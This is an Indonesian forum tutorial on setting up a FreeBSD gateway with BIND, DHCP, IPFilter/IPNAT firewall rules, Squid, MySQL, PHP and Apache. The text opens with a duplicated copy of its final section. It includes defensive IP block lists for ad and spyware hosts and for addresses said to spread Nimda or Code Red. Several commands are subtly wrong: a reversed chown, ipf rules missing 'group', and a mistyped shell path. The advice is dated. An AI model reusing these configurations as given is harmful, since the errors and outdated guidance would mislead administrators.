Sebelumnya kita harus cd ke source apache dulu: cd /usr/local/src/apache, lalu jalankan ./configure (plain).

Kemudian baru cd ke source php: cd /usr/local/src/php dan mengkonfigurasi php sesuai preferensi kita.

/configure \
--build=i686 \
--prefix=/usr/local \
--with-mysql=/usr/local \
--with-apache=../apache \
--with-pcre-regex=/usr/local \
--with-mcrypt \
--with-zlib \
--with-ftp \
--enable-track-vars \
--enable-ctype

make; make install

==Apache==

/configure \
--enable-module=most \
--enable-shared=max \
--server-uid=www \
--server-gid=www \
--activate-module=src/modules/php4/libphp4.a

make; make install

==Penutup==

Sesuai dengan tujuan utama tulisan ini, beberapa sub-sistem mungkin hanya sedikit atau sama sekali tidak dibahas, bagian-bagian tersebut dianggap sesuai dengan instalasi default.
Terakhir, penulis dengan senang hati akan menerima kritik dan saran dari pembaca semua, semoga ada manfaatnya.

aa, aa.delphi@yahoo.com

URL: http://opensource.telkomspeedy.com/forum/viewtopic.php?pid=22122

Mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global

2008-07-27T03:53:42Z

Aa: /* Konfigurasi awal (Cache-Only DNS Server): */

Sumber: aa, aa.delphi@yahoo.com
URL: http://opensource.telkomspeedy.com/forum/viewtopic.php?pid=22122

Dalam tulisan ini akan dibahas (mudah-mudahan) secara cukup detail, bagaimana mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global, baik dinamik maupun statik (dial-up PPP, Cable-Modem atau DSL).

Model network seperti ini merupakan model yang sangat umum digunakan oleh warnet serta perusahaan kecil yang berniat untuk memberikan akses internet yang murah meriah bagi para karyawannya.

Teknik yang akan dibahas ini merupakan salah satu (mungkin merupakan yang terbaik) dibandingkan dengan alternatif lainnya seperti menggunakan hardware tertentu (modem dengan kapabilitas internet sharing), kelemahan: jumlah host sangat terbatas, antara 2 - 8, serta fleksibilitasnya sangat rendah, hampir tanpa menggunakan pengamanan dari intruder.

Pilihan lainnya adalah dengan sistem operasi MS Windows (yang sudah sangat familiar), fleksibilitas cukup, namun dengan tingkat pengamanan yang relatif rendah.

Pilihan OS lainnya seperti Linux, OpenBSD atau Solaris bisa juga diperhitungkan, namun overall performance, kombinasi FreeBSD dan IPF adalah yang terbaik dinilai dari segi keamanan/security, performansi, dukungan resources (software, kompatibilitas, utilitas dan dokumentasi) yang tersedia, serta biaya yang dibutuhkan. Dengan FreeBSD mesin 386 tua milik kita disulap menjadi sebuah server yang powerful, robust dan tahan banting.

cat: IPF (IPFilter) adalah paket firewal native dari OpenBSD, sistem operasi yang selama ini dinilai sebagai salah satu OS yang dianggap paling secure.

==Topologi Network==
<pre>
===============================================

_____
| ISP |
|_____|
DNS: 202.155.0.10, 202.155.0.20
|
| 10.20.30.40
___|___
|FreeBSD|...........
|_______| Virtual-Host 192.168.2.1
my.domain.box| Gateway
192.168.1.1 | Firewall - IPF/IPNAT
| DNS Server - BIND
Network: | HTTP Server - Apache
192.168.1.0 | Proxy Server - Squid
255.255.255.0| SQL Server - MySQL
|
|
_________|____...___
| | | |
__|__ __|__ __|__ __|__
Host1 Host2 Host3 HostN
</pre>

Ada 3 pokok bahasan utama dalam kasus ini.
# DNS
# DHCP Server
# IPF/IPNAT

lain-lain: Apache, MySQL dan Squid tidak akan dibahas panjang karena tidak esensial dalam konteks ini.

==DNS==

Untuk mengaktifkan name server jalankan /stand/sysinstal pilih menu Configure, kemudian Startup, lalu aktifkan (enable) named. Jika anda ingin menjalankan named dalam sandbox, isi named flags dengan argumen seperti dalam uraian butir 1.3.

Cara lainnya adalah dengan mengedit langsung /etc/rc.conf, ganti atau tambahkan entri di

/etc/rc.conf:
named_enable="yes"
named_flags="" #lihat uraian selanjutnya

==Cache-Only DNS Server==

Konfigurasi DNS yang paling sederhana, yang kemungkinan besar akan berjalan lancar adalah menggunakan konfigurasi jenis cache-only DNS Server, artinya server DNS kita TIDAK memiliki otoritas atas satu zone-pun juga kecuali localhost dan loopback network 127.

Kekurangan dari model DNS Server seperti ini adalah, tentu saja, host-host dalam network kita tidak dapat saling mengenal. Hal ini bisa kita uji dengan perintah ping dari satu host terhadap host lainnya.

cat.: Dalam terminologi BIND, zone adalah suatu area network dimana sebuah server DNS memiliki otoritas atas pengaturan nama atas host-host yang ada di dalamnya.

Untuk network yang relatif sederhana seperti pada small-office atau di organisasi kecil, suatu zone umumnya hanya berupa satu domain, sementara di organisasi yang cukup besar, seperti di lingkungan kampus dan terutama di sebuah ISP, biasanya sebuah server DNS akan menangani suatu zone yang terdiri atas lebih dari satu domain.

==Konfigurasi dalam named.conf==
<pre>
options {
directory "/etc/namedb";
forwarders {
// daftar DNS Server ISP kita misalnya:
202.155.0.10;
202.155.0.20;
};
};

zone "0.0.127.in-addr.arpa" {
type master;
file "localhost.rev";
};

zone "." {
type hint;
file "root.servers";
};
</pre>

==File-file database==

==File localhost.rev:==

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.
1 IN PTR localhost.domain.box.

cat.: Untuk menghindari salah ketik, sebaiknya kita cukup menjalankan perintah: sh make-localhost di direktori /etc/namedb.

==File root.servers:==
File ini tidak perlu dirubah, biarkan saja sesuai defaultnya.

==Internal-Root DNS Server==
Seperti dapat dilihat pada gambar diatas, network kita termasuk kedalam network kelas C, dengan alamat 192.168.1.0 dan netmask 255.255.255.0. IP address network card pertama (if_1) ditetapkan oleh ISP, sementara if_2 dapat kita tentukan sendiri.

Selanjutnya kita dapat menetapkan hal-hal sebagai berikut:

Zone/domain: domain.box
Reverse-Network: 1.168.192.in-addr.arpa
Server address: 192.168.1.1
Server name: my.domain.box

==Konfigurasi dalam named.conf:==

==Konfigurasi awal (Cache-Only DNS Server):==
<pre>
options {
directory "/etc/namedb";
forwarders {
// daftar DNS Server ISP:
202.155.0.10;
202.155.0.20;
};
version "19.09.1969";
};

zone "0.0.127.in-addr.arpa" {
type master;
file "localhost.rev";
};
</pre>

==Konfigurasi named.conf yang perlu ditambahkan (atau dirubah):==

forward;

zone "domain.box" {
type master;
file "box/domain.db";
};

zone "1.168.192.in-addr.arpa" {
type master;
file "box/domain.rev";
};

zone "." {
type hint;
//file "root.servers";
file "box/root.box";
};

==File-file database==

==File localhost.rev:==

Tidak perlu ada perubahan dalam file ini, sama dengan butir 1.1.2.1 diatas.

==File domain.db:==

Berisi daftar translasi name to address untuk seluruh host yang ada di domain domain.box, hati-hati character comment di sini adalah semi-colon (;) bukan hash (#).

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

localhost IN A 127.0.0.1

my IN A 192.168.1.1
host1 in cname my
host2 IN A 192.168.1.2
host3 IN A 192.168.1.3
..
..
..
host254 IN A 192.168.1.254

cat.: Perhatikan bahwa dalam database ini kita perlu menambahkan entri untuk localhost, sehingga setiap rujukan atas localhost, dari manapun juga, akan diarahkan ke loopback masing-masing.

==File domain.rev:==
Kebalikan dari domain.db, merupakan reverse address to name atas domain.box untuk network 192.168.1.0/24

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

1 IN PTR my
2 IN PTR host1
3 IN PTR host2
..
254 IN PTR host254

cat.: Perhatikan bahwa tidak bisa dilakukan reverse untuk alias atau CNAME (canonical-name). Tidak diperbolehkan terdapat *dua entri yang sama* untuk *satu nomor address*, atau dengan kata lain, satu nomor adress tidak boleh merujuk kepada dua nama yang berbeda. Sebaliknya bisa saja terdapat dua nomor address untuk satu nama, misalnya jika kita memiliki dua atau lebih network card dalam satu host yang masing-masing memiliki IP sendiri.

==File root.box:==

File ini merupakan modifikasi dari file root.servers, yaitu dengan menambahkan RR (Resource Record) yang menyatakan bahwa server kita memiliki otoritas atas root domain.

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

;domain "domain.box" didelegasikan langsung dari root
domain.box. 9999999 IN NS my.domain.box.

;juga reverse dari class-C network
1.168.192.in-addr.arpa 9999999 IN NS my.domain.box.

;glue records
my.domain.box. IN A 192.168.1.1

;daftar root server selanjutnya sama dengan default di file root.servers
..

==DNS Server in the sand-box==

Konfigurasi server DNS ini terutama ditujukan untuk memperketat sekuriti sistem network, prinsipnya sederhana, yaitu menjalankan servis DNS (named) oleh non-privilege user, untuk ini biasanya sengaja dibuat satu user khusus, tanpa fasilitas login.
Sebenarnya untuk model network kita yang sederhana, ancaman sekuriti yang ada mungkin tidak akan terlalu serius. Konfigurasi ini bisa jadi sebagai opsi yang bisa diambil ataupun tidak.

1.3.1
Buat user baru untuk servis DNS, misalnya dengan nama: bind.
User group: bind (default)
User home: /usr/local/bind
shell: no, nologin atau nonexistent

1.3.2
ganti atau tambahkan entri di /etc/rc.conf:
named_flags="-u bind -g bind -w /usr/local/bind -c named.conf -t /usr/local/bind"

Penjelasan atas argumen:
-u dan -g: user serta group yang menjalankan servis DNS adalah "bind".
-w dan -c: direktori kerja dan nama file konfigurasi yang dipakai.
-t: setelah melakukan inisialisasi, servis DNS menjadikan /usr/local/bind
sebagai root direktorinya (chroot).

Dengan penggantian user, group dan chroot, servis DNS ini tidak lagi memiliki akses tak-terbatas atas resources, sehingga perlu dilakukan lagi beberapa penyesuaian:

1.3.2.1

Servis named dan ndc biasanya menampilkan prosess-id-nya dibawah sub-direktori /var/run, karena root-directory-nya berubah, maka kita harus membuat secara manual subdirektori /var/run dibawah /usr/local/bind, jangan lupa ownershipnya harus disesuaikan menjadi bind:bind

1.3.2.1

Jika penyesuaian sub-direktori diatas tidak dilakukan maka setidaknya harus dibuat penyesuaian dalam option named.conf:
[pre]
options {
...

directory "/"; //(atau mudahnya hapus saja option ini)
pid-file "named.pid" //named.pid berada di direktori root yang baru

...
}
[/pre]

1.3.3

Pindahkan atau salin /etc/namedb ke /usr/local/bind.

cat.: Perhatikan ownership dari /usr/local/bind, jika kita menyalinnya dengan tool atau file-manager seperti midnight- commander, biasanya ownership akan berubah dari bind ke root (atau privileged user pada saat itu), sehingga harus dikembalikan lagi dengan chown -r bind:bind /usr/local/bind.

Penyesuaian ownership ini juga berlaku untuk direktori baru dibawahnya yang kelak digunakan untuk file-file yang meminta akses-tulis seperti log, dump, stat, pid, dsb.

1.3.4
[pre]
Hentikan proses named yang saat itu berlangsung (dengan kill, killall atau top), lalu aktifkan kembali named (dengan argumen seperti named_flags diatas), atau reboot server.
[/pre]

2. DHCP Server

2.1. Instalasi dan Setup

Dengan /stand/sysinstall, install package isc-dhcpd.
Instalasi ini hanya sekedar mengekstrak program dan dokumentasi dhcpd, kita *harus* membuat sebuah file yaitu /var/db/dhcpd.lease secara manual: touch /var/db/dhcpd.leases.
Edit file /usr/local/etc/dhcpd.conf dengan editor kesayangan anda, fi-ay :), dan buat alokasi dinamis IP addresses untuk network 192.168.1.0/24 misalnya:

#jangan lupa menggunakan fasilitas syslog
#dalam syslog.conf tambahkan entry sbb:
# local7* /var/log/dhcpd.log #awas: pake TAB, jangan pake spasi!

log-facility local7;
authoritative;
ddns-update-style ad-hoc;

option domain-name "domain.box";

subnet 192.168.1.0 netmask 255.255.255.0 {
option netbios-name-servers 192.168.1.3; #server NT kita
option domain-name-servers 192.168.1.1;
option routers 192.168.1.1;
pool { range 192.168.1.10 192.168.1.190; }
}

2.2. Menjalankan dhcpd
DHCP server sebaiknya dijalankan pada saat boot-up dengan membuat file startup di /usr/local/etc/rc.d
Untuk menjalankan secara manual ketikan perintah: dhcpd if_2 (if_2 adalah interface yang terhubung dengan network lokal)

3.IPF/IPNAT

'Official' firewall dari FreeBSD adalah ipfw/natd, kelebihan ipfw terutama adalah kemampuan untuk mengatur kuota bandwith, sementara kelebihan ipf/ipnat yang paling utama adalah performansi. Juga menurut authornya, ipf benar-benar melakukan kontrol terhadap TCP/IP state, tidak cuma artifisial (sekedar mengecek kombinasi flags tertentu seperti SYN/ACK) seperti yang dilakukan dalam paket firewall lainnya.

Dalam bahasan kali ini, kita akan menggunakan IPFilter/IPNAT.

3.1. Kompilasi kernel

Untuk memasang firewall kita harus mengkompile ulang kernel (selanjutnya kita bisa mencopot-pasang lagi lewat loadable kernel module).

3.1.1 Konfigurasi kernel

cd /usr/src/sys/i386/conf
option tambahan kernel kita dari GENERIC adalah sbb:

#--- start kernel options ---
#hapus semua options cpu kecuali model tertinggi sesuai cpu anda
#cpu I386_CPU
#cpu I486_CPU
#cpu I586_CPU
cpu I686_CPU
maxusers 32

#kostumisasi kernel (lihat juga catatan tambahan)
ident AA
makeoptions KERNEL=AA

#jangan lupa mengganti entri di /boot atau /etc/defaults/rc.conf
#userconfig_script_load="YES"
#kernel="/AA"
#verbose_loading="YES"
#autoboot_delay="3"
#bootfile="AA,aa,kernel"

#kita tidak memakai 386SX kebawah, jadi emulasi mathco bisa dihapus saja
#options GPL_MATH_EMULATE #Support for x87 emulation

#console menggunakan teks mode 90x60
device vga0 at isa?
options VGA_WIDTH90 #90 baris VGA
options VESA

#jangan lupa nanti tambahkan font dan screenflags di /etc/rc.conf sbb:
#font8x14="cp437-8x14"
#font8x16="cp437-8x16"
#font8x8="cp437-8x8"
#allscreens_flags="VGA_90x60"

#hapus splash screen/screen saver.
#pseudo-device splash

#selain UFS, dalam box kita terdapat juga NTFS dan EXT2FS
options NTFS #NT
options EXT2FS #Linux
options NFS_NOSERVER #Membuang kode NFS

#options UNION #UFS bisa digabung
#options NULLFS #null
#options UMAPFS #UID Map FileSystem
#options KERNFS #kernel
#options SMBFS #SMB/File Sharing ala Windows
#options PROCFS #memetakan Process ID

# Tambahkan flags 0xb0ff (maks. drive blok transfer) untuk hard-disk
# untuk sepasang hard-disk per-interface flagsnya adalah 0xb0ffb0ff
device ata0 at isa? port IO_WD1 irq 14 flags 0xb0ffb0ff
device ata1 at isa? port IO_WD2 irq 15 flags 0xb0ffb0ff

options SOFTUPDATES #penting untuk meningkatkan performansi
options ATA_STATIC_ID #Static device numbering

#hapus saja tape-drive.
#device atapist # ATAPI tape drives

# jika menggunakan APM, sebaiknya tidak.
#device apm0 at nexus? disable flags 0x20 # Advanced Power Management

# PCCARD (PCMCIA) support, buang saja
#device card
#device pcic0 at isa? irq 0 port 0x3e0 iomem 0xd0000
#device pcic1 at isa? irq 0 port 0x3e2 iomem 0xd4000 disable

#Buang saja serial 2 dan 3
#device sio2 at isa? disable port IO_COM3 irq 5
#device sio3 at isa? disable port IO_COM4 irq 9

#Buang juga koneksi lewat Parallel port
#device plip # TCP/IP over parallel
#device ppi # Parallel port interface device
#device vpo # Requires scbus and da

#Buang semua entri ethernet yang tidak ada
#saya cuma punya 3Com 3C509, 3C905 dan realtek
device ep # 3Com 3C509 (10 MBps)
device xl # 3Com 3c905 (10/100)
device rl # RealTek 8129/8139 (10/100)
#device de # Realtek lama (10)

#Banyak software yang tergantung kepada bpf
#(discouraged), tapi sebaiknya tetap dipasang
pseudo-device bpf #Berkeley packet filter

#Buang semua options USB yang hardwarenya tidak ada
device uhci # UHCI PCI->USB interface
device ohci # OHCI PCI->USB interface
device usb # USB Bus (required)
device ugen # Generic
#device uhid # "Human Interface Devices"
#device ukbd # Keyboard
#device ulpt # Printer
#device umass # Disks/Mass storage - Requires scbus and da
#device ums # Mouse
#device uscanner # Scanners
# USB Ethernet, requires mii
#device aue # ADMtek USB ethernet
#device cue # CATC USB ethernet
#device kue # Kawasaki LSI USB ethernet

#Soundcard (generik)
device pcm

#jangan lupa nanti untuk membuat entri2 sound
#(audio, mixer, sequencer dll) di /dev:
#cd /dev
#./MAKEDEV snd

#Intel PIIX4 Power Management Unit
#device smbus
#device intpm

#Berhubung SCSI card saya sudah sangat kuno, akhirnya saya cabut :)
#Jika tidak memiliki SCSI, semua options yang behubungan dengan skasi
#bisa dibuang

#options SCSI_DELAY=8000 #Delay (in ms) before probing SCSI
# SCSI Controllers
#...
# SCSI peripherals
#...

#Jika menggunakan firewall bawaan FreeBSD:
#options IPFIREWALL
#options IPDIVERT
#options IPFIREWALL_VERBOSE
#options IPFIREWALL_VERBOSE_LIMIT=32
#options IPFIREWALL_DEFAULT_TO_ACCEPT

#Jika anda memasang bandwith quota tambahkan entri dibawah ini
#options IPDIVERT #digunakan juga oleh ipfw/natd
#options DUMMYNET
#options QUOTA

#Konfigurasi ipfilter/ipnat ini yang kita pakai
#cat. jika menggunakan IPFilter TIDAK PERLU ditambahkan
#lagi options IPDIVERT seperti yang terdapat dalam
#beberapa dokumentasi online

options IPFILTER
options IPFILTER_LOG
options IPFILTER_DEFAULT_BLOCK

#untuk memperketat firewall bisa ditambahkan options dibawah ini:
options IPSTEALTH
options TCP_DROP_SYNFIN
options TCP_RESTRICT_RST

options MROUTING
options RANDOM_IP_ID

#beberapa options lainnya untuk memacu performa
options NBUF=4096
options NMBCLUSTERS=8192

#catatan tambahan:

#Jika anda ingin mengubah release, copyright et-al., lakukan perubahan ini
#di /usr/src/sys/conf/newvers.sh

#dari original
#TYPE="FreeBSD"
#REVISION="4.3"
#BRANCH="RELEASE"
#RELEASE=4.3-RELEASE
#VERSION="${TYPE} ${RELEASE}"
if [ X"$COPYRIGHT" = X ]; then
COPYRIGHT="/*
* Copyright (c) $year
* FreeBSD Inc. All rights reserved.
*
*/"
fi

#menjadi violated
TYPE="mbakNunix"
REVISION="1.31"
BRANCH="BURIX"
RELEASE=1.31-BURIX
VERSION="${TYPE} ${RELEASE}"
COPYRIGHT="
/*** aa, aa.delphi@yahoo.com, 1995-$year ***/
"

2.1.2 Kompilasi

Akhirnya kita kompile kernel sbb:

su (kita harus root)
cd /usr/src/sys/i386/conf
chflags noschg AA (jika sekuriti diperketat, biasanya kernel diberi flag schg)

/usr/sbin/config -r AA && \
cd ../../compile/$1 && \
(make depend) 2>~/err1 && \
make 2>~/err2 && \
(make install) 2>~/err3

semua error message masing-masing akan dicatat di /root, file: err1, err2 dan err3

3.2. Mengkonfigurasi IPF/IPNAT

3.2.1. Konfigurasi rc.conf
Konfigurasi umum seperti biasa dilakukan di rc.conf

3.2.2. Konfigurasi syslog.conf

3.2.3. Tuning sysctl.conf
net.inet.ip.forwarding=1
net.inet.ip.fastforwarding=1

3.2.4. ipnat.rules
Rules untuk IPNAT dibahas lebih dulu karena relatif jauh lebih sederhana daripada rules untuk IPF

Catatan:
map artinya: remap SOURCE packet's IP address
rdr artinya: redirect DESTINATION of packet's IP address

Tambahkan baris berikut untuk mengemap :) port ftp

map rl1 192.168.1.0/24 -> 0/32 proxy port 21 ftp/tcp
map rl1 192.168.1.0/24 -> 0/32 portmap tcp/udp 49152:65535 #nomor port bebas antara 0-65535
map rl1 192.168.1.0/24 -> 0/32

HTTP request di redirect ke server

rdr rl1 0/32 port 80 -> 192.168.1.1 port 80 tcp

#jika perlu permintaan http dari lokal bisa di redirect ke SQUID port 3128
#rdr rl0 0.0.0.0/0 port 80 -> 192.168.1.1 port 3128 tcp

3.2.5. ipf.rules

Default konfigurasi adalah block in all, block out all artinya dengan konfigurasi seperti ini server kita benar-benar jadi mahluk egois, tidak mau melihat kanan-kiri sedikitpun :)

konfigurasi paling sederhana yang bisa berjalan adalah:

pass in all
pass out all

Artinya sama saja dengan tidak memasang firewall.

jika server kita hanya digunakan untuk mengakses internet keluar (outward-only), cukup kita isi firewall rules dengan satu baris:

pass out quick all keep state keep frags

untuk ipf ver 4.32 (FreeBSD 4.5+) rule "keep" tidak bisa diterapkan kepada paket selain tcp/udp/icmp, jadi rule diatas dibagi menjadi:

pass out quick proto tcp/udp all keep state keep frags
pass out quick proto icmp all keep state keep frags
pass out quick all

Dengan menggunakan keep state, kita tinggal membuka port yang kita perlukan saja, lalu-lintas koneksi yang terkait dengan servis/port tsb selanjutnya ditangani oleh ipf, misalnya:

block in quick all
pass out quick proto icmp all icmp-type echo keep state

meski diatas terdapat block, icmp-reply akan tetap bisa masuk masuk karena memang diminta oleh icmp-echo.
pada protokol tcp/udp lainnya, pembukaan gerbang masuk ini mencakup juga control messages berupa icmp atau bahkan segmen IP dengan nomor port lainnya yang berbeda, yang masih terkait dalam koneksi tersebut.

catatan tambahan:
Sebaiknya keep-state jangan terlalu di-obral supaya tidak menghabiskan resources atau bahkan membuka celah security berupa Denial of Service (DoS) Attack, lebih tepat kiranya jika hanya protokol TCP dengan SYN Flag serta port-port tertentu saja yang dipasangi keep-state seperti FTP (21), SSH (22), SMTP (25), DNS (53), DHCP (67/58), serta ICMP echo.
Jika hanya permintaan koneksi (ditandai dengan SYN flag) dari servis/port tertentu yang dibuka, jalur masuk semua ditutup (block in all), port FTP mau tidak mau harus diberi keep state karena setelah koneksi terjadi dia akan membuka port/jalur baru (UDP port 20, atau TCP dengan unassigned [high number] port) untuk komunikasi data.

pass out quick proto tcp flags S keep state
pass out quick proto udp port = 53 keep state
pass out quick proto icmp all icmp-type echo keep state
pass out quick all

Karena pembahasan ipf ini cukup panjang, maka akan kita singkat saja dengan menggunakan rules yang berguna secara umum

[pre]
#UMUM
pass in quick on lo0
pass out quick on lo0

#NBNS
block return-rst in quick proto tcp all port 136 >< 140
block return-icmp-as-dest(port-unr) in quick all port 136 >< 140

#============================================================
#if_1 adalah eksternal interface (yang terhubung ke internet)
#============================================================

#INWARD
#------
block in quick on if_1 all head 10000
#Start group 10000

block in quick all with opt lsrr group 10000 #block loose src routing
block in quick all with opt ssrr group 10000 #block strict src routing
block in quick proto tcp all with frags group 10000

#block no. ip address yang diketahui berbahaya, bervirus dsb.
#block in quick proto tcp/udp from Danger_IPs group 10000
#(lihat daftar 3.2.5.2)

pass in quick proto tcp all port = http flags S keep state group 10000 #jika kita pasang web server

block in quick proto icmp all head 11000 group 10000 #blok icmp yang tidak perlu
#Start group 11000
#pass in log first quick proto icmp all icmp-type echo group 11000
pass in quick proto icmp all icmp-type echorep group 11000
pass in quick proto icmp all icmp-type unreach group 11000
pass in quick proto icmp all icmp-type redir group 11000
pass in quick proto icmp all icmp-type timex group 11000
block in return-icmp-as-dest(host-unr) in quick all group 11000
#End group 11000

#__________________________________________________
block return-rst in quick proto tcp all group 10000
block return-icmp-as-dest(port-unr) in quick all group 10000

#End group 10000

#OUTWARD bebas
#-------------
block out quick on if_1 all head 20000
pass out quick proto tcp/udp all keep state keep frags group 20000
pass out quick proto icmp all keep state keep frags 20000
pass out quick all 20000

#===========================================================
#if_2 adalah internal interface (yang terhubung ke intranet)
#===========================================================

#INWARD
#------
block in quick on if_2 all head 30000
#Start group 30000

#Test User, tahan uninitialized host
block in quick from !192.168.1.1/24 to any head 31000 group 30000
#Start group 31000

#Unknown User, harus daftar dhcp dulu
pass in log first quick proto tcp/udp from any port = 68 to any port = 67 group 31000
block return-icmp-as-dest(host-unk) in log first quick all group 31000 #Unknown

#HTTP
#Tahan dulu http untuk diinterogasi, mau kemanakah tujuannya.
block in log first quick all port = http head 32000 group 31000
#Start group 32000

#HTTP block template: popups, junker, spammer etc. dilarang!
block return-rst in log first quick proto tcp from any to 64.38.238.0/18 group 32000 #ADS!
block return-rst in log first quick proto tcp from any to 66.28.153.36/24 group 32000 #porn&spy!
#...dst (lihat daftar 3.2.5.1 yang berisi IP popups/spyies)

#aman...
pass in log first quick proto tcp all flags S keep state keep frags group 32000

#HTTP-TCP only, yg lainnya di-blok by default!
block return-rst in quick proto tcp all group 32000

#End group 32000
#End group 31000

#Pada tahap ini user telah dikenal (dari 192.168.1.1/24) dan dengan permintaan port selain http
#atau user dari 192.168.1.1/24 dengan port http namun protokolnya selain tcp

#Tahan permintaan DNS keluar
block return-icmp-as-dest(filter-prohib) in quick proto tcp/udp from any to 202.155.0.10/24 port = domain group 30000

pass in log first quick proto tcp/udp all port < 1024 keep state group 30000 #regular ports
pass in log first quick proto tcp/udp all port = 3130 keep state group 30000 #SQUID
pass in log first quick proto tcp/udp all port = 3306 keep state group 30000 #MySQL

#__________________________________________________
#lainnya secara default di-blok
block return-rst in quick proto tcp all group 30000
block return-icmp-as-dest(port-unr) in quick all group 30000

#End group 30000

#OUTWARD bebas
#-------------
block out quick on if_2 all head 40000
pass out quick proto tcp/udp all keep state keep frags 40000
pass out quick proto icmp all keep state keep frags 40000
pass out quick all 40000
[/pre]

3.2.5.1 Daftar alamat IP popup
Berikut ini daftar ip popup dan advertising banner, spy, spammer dll yang selain menyebalkan juga kadang berbahaya.
cat.: ganti kata "BLOK" dengan: "block return-rst in log first quick proto tcp from any to", juga nomor group disesuaikan dengan konfigurasi

#HTTP block template

#Hall Of Fames - top of sh*ts!-
BLOK 64.38.238.0/18 group 42000 #popups.ini
BLOK 64.38.223.51/24 group 42000 #!!!trafficcashgold.com
BLOK 64.38.226.6/24 group 42000 #maxcash.cavecreek.net
BLOK 64.38.247.60/24 group 42000 #count1-old.paycounter.com[]
BLOK 205.180.85.40/24 group 42000 #popups.ini TOP!!! media.fastclick.net
BLOK 202.180.8.129/24 group 42000 #ns1.servercyber.com
BLOK 207.68.178.251/24 group 42000 #ads.msn.com
BLOK 207.68.185.58/24 group 42000 #autosearch.msn.com
BLOK 207.68.171.254/24 group 42000 #adobe-spy
BLOK 207.68.172.253/24 group 42000 #adobe-spy
BLOK 207.68.173.254/22 group 42000 #adobe-spy
BLOK 209.225.0.6/24 group 42000 #servedby.advertising.com
BLOK 209.225.4.72/24 group 42000 #advertising.com

#telkom!dont-block: BLOK 203.130.252.36/24 group 42000 #mencurigakan sih

#dangerous!
BLOK 66.28.38.3/24 group 42000 #
BLOK 209.50.252.100/24 group 42000 #4bigcash.com
BLOK 209.5.187.10/24 group 42000 #freepopups.com
#BLOK 209.5.187.16/24 group 42000 #adpowerzone.com
#BLOK 213.249.1.67/24 group 42000 #d67.kif2.nas.panafonet.gr
#End dangerous

#from popups.ini
BLOK 12.42.235.3/24 group 42000 #popups.ini
#...long-list...
BLOK 216.95.228.15/24 group 42000 #popups.ini
#end-from popups.ini

#new compilation
#BLOK 66.206.15.201/24 group 42000 #indo-porn, gapapa-lah
BLOK 63.167.204.56/24 group 42000 #7adpower.com
#...long-list...
BLOK 128.11.42.61/24 group 42000 #burstnet.com
#dont-block-yahoo: BLOK 66.218.71.80/24 group 42000 #w1.scd.yahoo.com
#end-new compilation

#old compilation
BLOK 12.90.179.10/16 group 42000
BLOK 63.215.149.25/24 group 42000 #porno
BLOK 192.150.10.120/16 group 42000 #adobe spyier!!!
#...long-list...
BLOK 216.218.220.42/24 group 42000 #servergold.com - porn
#beware! Namezeroes are always peeking our nbns port!
BLOK 216.34.13.245 port != 80 group 42000

#end-old-compilation

3.2.5.2 Daftar alamat IP berbahaya
Berikut ini daftar alamat IP berbahaya karena menyebarkan virus nimda atau code-red hingga tulisan ini dibuat (mungkin IP anda tercantum disini, selamat! :)).
penggunaannya dalam ipf.rules misalnya:

block return-rst in log first quick on rl1 proto tcp from 202.10.35.227 to any Group 23456 #Nimda

4.47.218.144#code_red

#internal INDOSAT NET-10.X.X.X
10.1.8.108#nimda
10.6.2.4#nimda
#...long-list...
10.6.18.68#nimda
#end: internal INDOSAT NET-10.X.X.X

24.73.201.22#code_red
24.80.172.120#code_red
#...long-list...
24.196.16.168#code_red
219.8.104.74#nimda

4.Lain-lain
Dalam bagian ini diasumsikan bahwa kita akan menginstal program dari source kodenya, yang diekstrak ke direktori /usr/local/src, mis.: tar -xpvzf apache.tgz -C /usr/local/src.
bagian version number, jika ada, sebaiknya dihilangkan, mis.: mv apache-1.1.23pl8 apache

4.1. Squid
/configure --enable-ipf-transparent \

#parameter lain yang perlu:
--prefix=/usr/local \
--bindir=\${prefix}/sbin \
--libexecdir=\${prefix}/libexec \
--sysconfdir=\${prefix}/etc/squid \

#parameter lain yang mungkin perlu:
--enable-storeio="ufs diskd null" \
--enable-removal-policies="lru heap" \

#parameter tambahan:
--localstatedir=\${prefix}/squid \
--host=i686 \
--disable-ident-lookups \
--disable-wccp \
--enable-kill-parent-hack \
--enable-time-hack \
--with-pthreads

make all; make install

Dengan parameter diatas kita akan memperoleh konfigurasi squid yang mirip seperti jika kita menginstalnya melalui package.
Kemudian file logs dan cache di direktori /usr/local/etc/squid di chown nobody:nogroup (atau sesuai dengan usernya jika telah dibuat user untuk squid, seperti user mysql dibawah).
Setelah itu kita buat intial cache directory dengan menjalankan: squid -z. Default cache size adalah 100MB.

==Konfigurasi MySQL, PHP dan Apache==

==MySQL==

/configure \
--localstatedir=/var/db/mysql \
--with-unix-socket-path=/var/run/mysql.sock \
--host=i686 \
--enable-assembler \
--with-libwrap \
--with-berkeley-db \
--with-named-z-lib \
--with-mysqld-ldflags=-all-static \
--with-client-ldflags=-all-static \
--without-debug \
--without-bench \
--without-docs \
--without-readline

make; make install

Tambahkan user mysql dengan ID misalkan = 3036

pw add group mysql -g 3036
pw add user mysql -u mysql -g mysql -wno -s /sbin/nologint -d /var/db/mysql -c "MySQL"

Direktori localstatedir (/var/db/mysql) diatas, *harus* read/write by user mysql:
chown -R /var/db/mysql mysql:mysql

==PHP==
Sebelumnya kita harus cd ke source apache dulu: cd /usr/local/src/apache, lalu jalankan ./configure (plain).

Kemudian baru cd ke source php: cd /usr/local/src/php dan mengkonfigurasi php sesuai preferensi kita.

/configure \
--build=i686 \
--prefix=/usr/local \
--with-mysql=/usr/local \
--with-apache=../apache \
--with-pcre-regex=/usr/local \
--with-mcrypt \
--with-zlib \
--with-ftp \
--enable-track-vars \
--enable-ctype

make; make install

==Apache==

/configure \
--enable-module=most \
--enable-shared=max \
--server-uid=www \
--server-gid=www \
--activate-module=src/modules/php4/libphp4.a

make; make install

==Penutup==

Sesuai dengan tujuan utama tulisan ini, beberapa sub-sistem mungkin hanya sedikit atau sama sekali tidak dibahas, bagian-bagian tersebut dianggap sesuai dengan instalasi default.
